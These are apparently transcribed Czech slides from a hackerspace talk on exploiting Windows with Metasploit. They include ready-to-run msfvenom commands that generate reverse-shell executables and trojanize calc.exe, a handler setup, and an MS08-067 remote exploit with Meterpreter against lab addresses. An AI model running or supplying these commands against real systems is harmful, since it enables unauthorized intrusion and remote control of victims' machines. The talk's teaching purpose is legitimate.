Hackerspace Pardubice
Transkript
Hackerspace Pardubice Exploitace Windows pomocí Metasploit frameworku Exploitace Windows pomocí Metasploit frameworku - Ivo Slanina Zranitelnosti ● ● ● ● Chyby v kódu aplikace Způsobeny nepozorností programátora, bugu v knihovnách nebo běhovém prostředí Zranitelnosti se evidují ve veřejných databázích – CVE (Common Vulnerabities and Exposures) – OSVDB (Open Source Vulnerability DataBase V databázích je uveden technická popis chyby, rating, odkazy na další zdroje a odkazy na exploity, doporučené opravení chyby, ... Exploitace Windows pomocí Metasploit frameworku - Ivo Slanina CVE-ID ● Formát CVE <year>-<arbitrary_digits> ● arbitrary_digits je ID zranitelnosti v daném roce ● Starý formát CVE používá 4 místa pro arbitrary_digits ● Nový formát používá 4 a více míst Exploitace Windows pomocí Metasploit frameworku - Ivo Slanina Exploit ● Malý program zneužívající chyb v kódu zranitelných aplikací ● Závislý na architektuře, OS, verzi aplikace, verzi OS, … ● Úkolem exploitu je zajistit kontrolovaný pád aplikace – ● Analogie: exploit otevírá dveře bez klíče, ovšem nic jiného Obvykle exploit obsahuje payload - shellcode Exploitace Windows pomocí Metasploit frameworku - Ivo Slanina Shellcode ● Skutečný škodlivý kód ● Většinou se píše v assembleru, velmi často i v binárním kódu ● Velmi úzce svázán s procesorem cílového počítače ● ● ● Lze ho použít i samostatně (samostatná .exe binárka, nakažení jiné aplikace, …) Shellcode se dá kódovat (obfuskace) a skrýt ho před antiviry nebo IDS/IPS Snaha o co nejmenší shellcode (menší shellcode se dá využít ve více situacích, snáze se propašuje do paměti) Exploitace Windows pomocí Metasploit frameworku - Ivo Slanina Metasploit ● ● ● Open-source framework s databází exploitů, shellcode, encoderů, pomocných skriptů, … Napsaný v ruby Původní autor je HD Moore, nyní vlastněný společností rapid7 ● Velmi jednoduchý na použití, oblíbený u Skript Kiddie ● Několik uživatelských rozhraní Exploitace Windows pomocí Metasploit frameworku - Ivo Slanina Vygenerování .exe souboru ● # msfvenom --arch x86 --platform windows --format exe -p windows/shell/reverse_tcp LHOST=192.168.56.103 LPORT=4444 > sploit.exe – -p – použitý shellcode – LHOST – adresa počítače kterému napadený stroj předá příkazovou řádku – LPORT – port kde naslouchá handler Exploitace Windows pomocí Metasploit frameworku - Ivo Slanina Spuštění handleru ● Z prostředí msfconsole ● msf > use exploit/multi/handler ● set payload windows/shell/reverse_tcp ● msf exploit(handler) > set LHOST 0.0.0.0 ● msf exploit(handler) > exploit Exploitace Windows pomocí Metasploit frameworku - Ivo Slanina Shellcode + existující exploit ● Easy RM to MP3 Converter (CVE 2009-1330) ● Chyba typu buffer overflow ● # msfvenom --arch x86 --platform windows --format python -p windows/shell/reverse_tcp LHOST=192.168.56.103 LPORT=4444 EXITFUNC=process --bad-chars '\x00\x09\x0a' Exploitace Windows pomocí Metasploit frameworku - Ivo Slanina Nakažení .exe binárky ● # msfvenom --arch x86 --platform windows --format exe -p windows/shell/reverse_tcp LHOST=192.168.56.103 LPORT=4444 -x calc.exe -k > evil_calc.exe Exploitace Windows pomocí Metasploit frameworku - Ivo Slanina Meterpreter ● Meta interpreter ● Velmi dobře skrytý před AV (nevytváří žádné procesy) ● Šifrovaná komunikace ● Vykonávání ve dvou fázích ● – Úvodní shellcode nejprve stáhne potřebný kód od útočníka – Pomocí DLL injection se načte kód meterpreteru Kód meterpreteru jde runtime modifikovat po síti Exploitace Windows pomocí Metasploit frameworku - Ivo Slanina Remote exploit ● ● ● ● ● ● CVE 2008-4250 msf > use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp msf exploit(ms08_067_netapi) > set LHOST 192.168.56.103 msf exploit(ms08_067_netapi) > set RHOST 192.168.56.102 exploit Exploitace Windows pomocí Metasploit frameworku - Ivo Slanina Q&A Děkuji za pozornost [email protected] Exploitace Windows pomocí Metasploit frameworku - Ivo Slanina Odkazy ● Metasploit Unleashed Exploitace Windows pomocí Metasploit frameworku - Ivo Slanina
Podobné dokumenty
Hackerem snadno a rychle aneb nebezpeční script-kiddies
vyrobí zlomyslný kód (payload, shellcode)
sestaví vhodně poškozený vstup (žádost)
naváže síťové spojení
zašle poškozený vstup (na serveru je spuštěn
payload)
• (obslouží následnou interakci útočník...
Streamery Pro-ject a Remote Box - Box control
obrázek alba ( pokud je obrázek k dispozici ) - Apple Lossless
Audio Codec, jedná se o bezztrátovou kopresi zvuku vyvinutý
společností Apple, výsledný soubor je velký cca 60% původní
velikosti. Avš...
Postup hraní předmíchaných sehravek
vyhrazen, objeví se tlačítko Připoj se. Hráči se připojí ke stolu a nesmí kliknout na
Hrajeme! Musí čekat, až náčelník povolí zahájení hry, protože nahrání sehrávky
je možné, jen když je stůl ve vy...
bezpečnost v sítích Martin MaKr Kratochvíl
– heslo obchází pomocí hacku admin.cgi/.gif
Šíření:
– pomocí „nc“ - požadavky na $IP/admin.cgi
Zabezpečení: lighttpd.conf a povolení „.gif“
Open Source Programování
Attribute: attribute in the manner specified in the ODbL.
Keep intact any notices on the original database.
ShareAlike: for all database adaptations and all derived
works, provide database under...
Administrace UNIXu
možnost změn v discı́ch za plného provozu
”nadměrná podpora” v Linuxu - problém s připojovánı́m
rozdı́lných RAID k jednomu serveru
Linux zatı́m postrádá jednotnou podporu pro všechna
mu...
Způsoby zabezpečení cloudových služeb Microsoft
© 2014 Microsoft Corporation. All rights reserved. The information herein is for informational purposes only and represents the current view of Microsoft
Corporation as of the date of this presenta...